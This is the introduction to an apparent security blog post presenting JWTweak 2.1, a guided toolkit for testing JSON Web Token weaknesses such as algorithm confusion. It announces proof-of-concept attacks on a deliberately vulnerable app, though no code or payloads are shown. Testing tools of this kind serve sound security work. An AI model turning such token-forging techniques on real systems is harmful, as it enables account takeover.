Introduction JSON Web Tokens sit at the heart of modern authentication – and because the token travels in the user’s hands, a single weak check on the server side can hand an attacker an admin account. JWTweak was built to test for exactly these flaws. It started as a small utility to switch a token’s algorithm and re-issue it in seconds, helping security enthusiasts hunt for issues like the JWT Algorithm Confusion Attack. Version 2.1 is a complete rewrite into a guided, menu-driven toolkit: you paste a token, it decodes and risk-analyses it, recommends the attacks that fit, and walks you through each one – entirely offline, with no flags to memorise. In this post we’ll tour the tool and then break into a deliberately vulnerable app with two live proof-of-concept attacks.
Securethy: Attack Scenarios & Audit Guides
Educational Purpose - Case study, attacks' scenarios and audit guidelines on vulnerabilities AI Powered